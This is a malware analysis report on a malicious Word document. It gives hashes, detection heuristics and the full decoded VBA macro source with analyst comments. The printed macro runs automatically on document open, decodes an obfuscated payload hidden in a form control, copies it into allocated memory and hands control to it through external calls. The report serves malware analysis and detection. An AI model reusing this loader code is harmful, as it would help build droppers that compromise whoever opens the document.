Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab1bcd9e957b6b52…

MALICIOUS

Office (OLE)

327.5 KB Created: 2017-10-03 14:18:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: c9986b5cedda68f075e1f4f2ddab3ae6 SHA-1: 3149033c54f75a8d9870508900a946e5136db892 SHA-256: ab1bcd9e957b6b525209f0f5d8b9b85478f782d738fc83d999e6c1e377711ad3
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' and 'ClamAV: Doc.Dropper.Agent-6352658-0' heuristics. The 'Document_Open' macro suggests an attempt to execute malicious code upon opening. The VBA script appears to be obfuscated but likely functions as a downloader for a second-stage payload, a common tactic for malware distribution.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6352658-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6352658-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim intersexual As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) in which each URL was found.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8449 bytes
SHA-256: 2ae0f20f1483c4a62fdd9c1397e927f17cb285869f181fc2255d405121d719ed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "abodule"

' Builds a 256-entry byte lookup table indexed by ASCII code; both parameters
' are ignored (the caller in caltrop passes 400 and 20).  The resulting mapping
' is the standard Base64 alphabet: 'A'..'Z' -> 0..25, 'a'..'z' -> 26..51,
' '0'..'9' -> 52..61, '+' -> 62, '/' -> 63.  Each loop bound runs one past the
' letter/digit range, so entries 91, 58 and 123 also receive stray values.
Function contaminated(pistol, polka)
Dim elephant(255) As Byte
' 83 - 47 + 29 = 65 ('A'); loop covers 65..91 and stores 0..26
restcure = 83 - 47 + 29
Do While restcure <= 90 + 1
elephant(restcure) = restcure - 65
restcure = restcure + 1
Loop
' 48 ('0') .. 58, stored as 52..62
restcure = 48
Do While restcure <= 50 + 8
elephant(restcure) = restcure + 4
restcure = restcure + 1
Loop
' 97 ('a') .. 123, stored as 26..52
restcure = 97
Do While restcure <= 120 + 3
elephant(restcure) = restcure - 71
restcure = restcure + 1
Loop
' '/' (47) -> 63 and '+' (43) -> 62 complete the alphabet
elephant(47) = 63
restcure = 43
elephant(restcure) = 60 + 2
contaminated = elephant
End Function

' Returns the Unicode code point of the first character of detonative (AscW).
' Not referenced anywhere else in the visible listing.
Function aperit(detonative)
aperit = AscW(detonative)
End Function


Attribute VB_Name = "Module1"
' Operator dispatcher used to hide arithmetic: carassius selects the operation
' applied to puncuality and resuspension.  The constant expressions evaluate to
' 47 (integer division \), 57 (bitwise And) and 65 (multiplication).  For any
' other selector potolok is never assigned, so the undeclared Variant (Empty)
' is returned.
Function schsfe(puncuality, resuspension, carassius)
' 47 + (5 - 5) = 47
If carassius = 47 + (10 / 2 - 5) Then
potolok = puncuality \ resuspension
' 57 + 1 - 1 = 57
ElseIf carassius = 57 + (5 - 3) / 2 - 1 Then
potolok = puncuality And resuspension
' 65 + (8 - 8) = 65
ElseIf carassius = 65 + (56 / 7 - 4 * 2) Then
potolok = puncuality * resuspension
End If
schsfe = potolok
End Function
'  The moon went hiding, stars quit shining
'  Rain was driving, thunder, lightning

' Decodes the payload text handed over by avuncular.  The input is treated as
' 7844 ANSI bytes: first a per-position shift is removed (even offsets minus 4,
' odd offsets minus 3), then the bytes are Base64-decoded four at a time using
' the table from abodule.contaminated, yielding 1961 * 3 = 5883 raw bytes in
' breadline.  The Byte array is assigned to a String-typed function result, so
' callers receive the decoded bytes as a String.
' The " Pmt ..." statements throughout this module are calls to the VBA
' financial function with the result discarded; they appear to be filler.
Function caltrop(inseverable) As String
' 6963-byte output buffer; only the first 5883 entries are written
Dim breadline(6962) As Byte
Dim briefing As Long
Dim impropriety As Long

Dim osutrigger As Long
' elief / achievable / constitution: precomputed i*262144, i*64, i*4096 for i = 0..63
Dim elief(63) As Long
Dim mantinea As Long
Dim alar() As Byte

Dim achievable(63) As Long
Dim constitution(63) As Long

Dim anguilliform() As Byte
' 128 = vbFromUnicode: String -> ANSI Byte array
anguilliform = VBA.StrConv(inseverable, 128)
 Pmt 0, 100, 8371, 34078, 5

' vbKeyShift is 16, so quickscented = 4
quickscented = vbKeyShift - 12
' Indices 0..7843: the input must hold at least 7844 bytes or this raises a
' subscript error (avuncular supplies exactly Right(..., 7844)).
For desmodus = (20 - 4 * 5) To 7800 + 43
If (desmodus Mod 2 = (5 - 5)) Then
' even position: undo a +4 shift
anguilliform(desmodus) = anguilliform(desmodus) - quickscented
ElseIf Not (desmodus Mod 2 = (4 - 4)) Then
' odd position: undo a +3 shift
anguilliform(desmodus) = anguilliform(desmodus) - (quickscented - 1)
End If
Next desmodus
 Pmt 0, 76, 37014, 55110, 4

' Base64 value table (the arguments 400, 20 are ignored by contaminated)
biplicity = abodule.contaminated(400, 20)
' schsfe(..., 65) is multiplication: 64 = 2^6, 4096 = 2^12, 262144 = 2^18
For osutrigger = (7 - 7) * 1 To (50 + 13) * (5 - 4)
achievable(osutrigger) = _
schsfe(osutrigger, _
51 - 73 + 86, _
65)
constitution(osutrigger) = _
schsfe(osutrigger, 112 - 102 + 4086, 65)
elief(osutrigger) = schsfe(osutrigger, 88 - 47 + 262103, 65)
Next osutrigger
 Pmt 0, 84, 35877, 21541, 7

alar = anguilliform
 Pmt 0, 76, 23498, 15343, 6

' accordance = 3 (offset of the 4th byte of a quad)
accordance = 100 - 56 - 41

' giantism = 2 (offset of the 3rd output byte)
giantism = 67 - 40 - 25
' briefing advances by 4 per pass (the +3 below plus Next); impropriety by 3
For briefing = (4 - 4) To 7800 + 43
bumpy = alar(briefing)
headquarters = alar(briefing + 2)
' mantinea = t(b0)*2^18 + t(b1)*2^12 + t(b2)*2^6 + t(b3): the 24-bit value of one quad
hilar = constitution(biplicity(alar(briefing + 1)))
dioscorea = achievable(biplicity(headquarters)) + _
biplicity(alar(briefing + accordance))
mantinea = elief(biplicity(bumpy)) + hilar + dioscorea
' (mantinea And 16711680) \ 65536 -> first output byte
osutrigger = schsfe(mantinea, 55 - 126 + 16711751, 50 + 7)
breadline(impropriety) = schsfe(osutrigger, 65 - 101 + 65572, 40 + 7)
' (mantinea And 65280) \ 256 -> second output byte
osutrigger = schsfe(mantinea, 118 - 18 + 65180, 50 + 7)
breadline(impropriety + 1) = schsfe(osutrigger, 35 - 84 + 305, 47)
' mantinea And 255 -> third output byte
breadline(impropriety + giantism) = schsfe(mantinea, 94 - 68 + 229, 57)
impropriety = impropriety + giantism + 1
briefing = briefing + 3
Next
caltrop = breadline
End Function



Attribute VB_Name = "Module2"
' Takes the decoded payload (a String inside a Variant) and stages it in a
' separately obtained memory region whose address is returned.  The two #If
' blocks select pointer-sized types: LongPtr with mendacious = 8 on the first
' branch, Long with mendacious = 4 on the second.  Both branches compare the
' Win64 constant against 0; whether that picks the intended branch depends on
' the value VBA gives Win64 - TODO confirm.
' extend and genitalia are not declared anywhere in the visible listing
' (Module4 is empty here), so their semantics are inferred from use only.
Function incapable(sapiens)
Dim belligerently As Variant
Dim catwalk As Integer
Dim chaucer As Byte
Dim appositively As Long
' 23 > 5 And 0 < Win64
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim myxomatosis As Long
Dim sedition As LongPtr
' mendacious = 8 (pointer size on this branch)
mendacious = 102 - 52 - 42
Dim brimstone As LongPtr
Dim desecration As Byte
Dim modernism As Variant
Dim accouplement As LongPtr
Dim valueless As Byte
#End If
' 21 > 5 And Not (0 < Win64)
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim sedition As Long
' mendacious = 4
mendacious = 118 - 111 - 3
Dim brimstone As Long
Dim accouplement As Long
#End If
' Copies mendacious bytes from VarPtr(sapiens) + 8 into sedition.  Offset 8 is
' where a VARIANT's value union begins, so this presumably reads the pointer
' to the payload string's characters - confirm against crosstalk's declaration.
nephrolithiasis = VarPtr(sedition)
sermonize = extend(nephrolithiasis, VarPtr(sapiens) + 8, mendacious)
' Arguments for the call below: -1, brimstone (0, by reference), 0,
' 9936 (by reference), 4096, 64
tarahumara = 79 - 106 + 26
brimstone = 25 - 45 + 20
archeologist = 20 - 77 + 57
accouplement = 1 - 72 + 10007
addressed = 52 - 38 + 4082
sarcosome = 53 - 88 + 99
' brimstone is 0 going in and is used as the copy destination afterwards, so
' genitalia appears to hand back a region address through it; 9936 covers the
' 5883 bytes copied below.  The routine is declared outside this listing.
tetonnement = genitalia(ByVal tarahumara, _
brimstone, ByVal archeologist, accouplement, ByVal addressed, _
ByVal sarcosome)
' filler
yam = yam

expressionism = "beardless"

' Copy 5883 bytes (124 - 46 + 5805) - the full output of caltrop - from the
' payload string's characters to the region at brimstone.
extend brimstone, sedition, 124 - 46 + 5805
' filler: unused values and a discarded Pmt call
imbibe = 30 + 1
misunderstood = 39330 + 0
gazebo = 416070 + 1
 Pmt 0, imbibe, 11127, 12298, 4

incapable = brimstone
End Function

' Orchestrates the payload: reads the encoded text from a control on the
' leptodactylus UserForm, decodes it with Module1.caltrop, stages the bytes
' with incapable, then passes an address inside the staged bytes to the
' external routine ensign.  Most other statements assign unused string or
' numeric values, or copy/compare undeclared (Empty) variables; they appear
' to be filler.  ensign, humphrey, geebung, calcaneal, actor and millettia
' are not defined anywhere in the visible listing.
Function avuncular()
Dim musclebound As String
Dim ranking As Long
' Day(#12/5/2013#) = 5; presumably selects the item whose Name is read below
leptodactylus.buteonine.Value = Day(#12/5/2013#)
' assigns the result of comparing asperous (Empty) with "monstrous" - filler
varday = asperous = "monstrous"
disgustedly = humphrey
marginally = geebung
explication = "momentous"
colostrum = calcaneal

donatus = actor
naproxen = "unconscious"
yaffle = "memorial"
Set towith = leptodactylus.buteonine.SelectedItem
anguished = 74
adad = 16881
adynamia = 231668
 Pmt 0, anguished, 17696, 54956, 5

' The encoded payload sits in the selected item's Name; the last 7844
' characters (52 - 24 + 7816) are decoded - the length caltrop expects.
cutout = towith.Name
sublineation = 52 - 24 + 7816
acetal = Right(cutout, sublineation)
fagales = Module1.caltrop(acetal)
adult = 60
increment = 34263
acroclinium = 486856
 Pmt 0, adult, 3783, 38171, 2

fendre = "astrologer"
wench = "macrocheira"
' 50 > 4 And Win64 > 0: pointer-sized declarations, unjustifiable = 2064
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim sulkiness As Long
Dim nonreciprocating As LongPtr
Dim crossbones As LongPtr
Dim afghani As Integer

Dim carol As String
Dim medley As LongPtr
Dim blather As LongPtr
Dim flageolet As LongPtr
unjustifiable = 74 - 85 + 2075
#End If
' otherwise: Long declarations, unjustifiable = 781 + 3459 = 4240
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim de As Variant
Dim crossbones As Long
Dim goodlooking As Byte
Dim nonreciprocating As Long

Dim medley As Long
extinguish = 120 - 90 + 751
Dim blather As Long
Dim flageolet As Long
unjustifiable = extinguish + 3459
#End If
nursing = 10 - 79 + 69
halfholiday = "plaster"
hypovolemia = 114 - 38 + 4020
inshore = 5
exude = 7913
filariid = 572397
 Pmt 0, inshore, 22828, 17760, 6

forfend = millettia
corpulence = "changeful"
disdainful = "managed"
indeterminate = 103
mystery = 16919
annex = 300455
 Pmt 0, indeterminate, 24790, 33813, 5

' incapable returns the address of the region holding the decoded bytes
epidiascope = fagales
golden = "adultness"
nonreciprocating = incapable(epidiascope)
coryphaenidae = "statistical"
annular = "status"
Dim obduration As String
Dim abattoir As Integer
' medley = 0; crossbones = region address + per-branch offset (2064 or 4240)
medley = 8 - 110 + 102
crossbones = nonreciprocating + unjustifiable
' blather = 201527; flageolet = 3500 is computed but never used
blather = 116 - 50 + 201461
flageolet = 105 - 64 + 3459
' External call receiving the address inside the staged bytes as its third
' argument - consistent with handing control to them.  ensign is declared
' outside the visible listing; confirm its declaration.
nazism = ensign(blather, medley, crossbones, medley, medley, medley, medley)
axenic = 24
arctium = 17955
churchill = 492273
 Pmt 0, axenic, 25360, 47372, 7

End Function

Attribute VB_Name = "Module3"
' Wrapper around the external routine crosstalk (declared outside the visible
' listing).  Forwards its arguments as crosstalk(-1, horsecar, somatic,
' forewing, monopteral) with monopteral unset (0) on entry.  incapable uses it
' as "copy forewing bytes from somatic to horsecar": once to read a pointer,
' once to fill the staged region - confirm against crosstalk's declaration.
' The string/number assignments and the Pmt call are filler; the function
' result is never assigned.
Function extend(horsecar, somatic, forewing)
' 50 > 4 And Win64 > 0: pointer-sized locals
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim alca As Byte
Dim ordo As Variant
Dim accused As LongPtr
Dim neurasthenia As LongPtr
Dim monopteral As LongPtr
Dim buganda As Long
Dim afoot As LongPtr
Dim airliner As LongPtr
#End If
' otherwise: Long locals
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim neurasthenia As Long
Dim callboard As Integer
Dim accused As Long
Dim snowplow As String
Dim afoot As Long
Dim overtaken As Integer
Dim monopteral As Long
Dim bimonthly As Long
Dim airliner As Long
Dim argosy As Byte
Dim endlessly As String
#End If
' filler
elephantus = Math.Round(435)
expressionism = "underling"
' destination, length, source
neurasthenia = horsecar
airliner = forewing
yam = "frappe"
afoot = somatic
selfworship = 110 + 4
gest = 6360 + 2
ceremony = 404330 + 7
 Pmt 0, selfworship, 5176, 35668, 8

expressionism = "caliche"
' accused = -1 (33 - 66 + 32), passed by value as the first argument
accused = 33 - 66 + 32
crosstalk ByVal accused, neurasthenia, afoot, airliner, monopteral
expressionism = expressionism
End Function

Attribute VB_Name = "Module4"

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




' Auto-run entry point: Word fires Document_Open when the document is opened
' (the OLE_VBA_DOCOPEN heuristic above).  Its only effective statement is the
' call to avuncular; the Dims, string and numeric assignments and the Pmt
' call are filler.
Private Sub Document_Open()
Dim intersexual As Variant
Dim hyetography As Variant
unpretentiousness = "dawdler"
kittentails = "astrocytic"
' runs the decode / stage / execute chain in Module2.avuncular
avuncular
coelo = 40 + 8
disfigurement = 20980 + 7
adhibition = 587870 + 0
 Pmt 0, coelo, 16481, 36653, 8
End Sub

Attribute VB_Name = "leptodactylus"
Attribute VB_Base = "0{B561C2D5-313D-4B73-9326-29B8460ACA37}{2FB88A8C-084A-4D7B-98CC-FCE0D0AA7F5D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False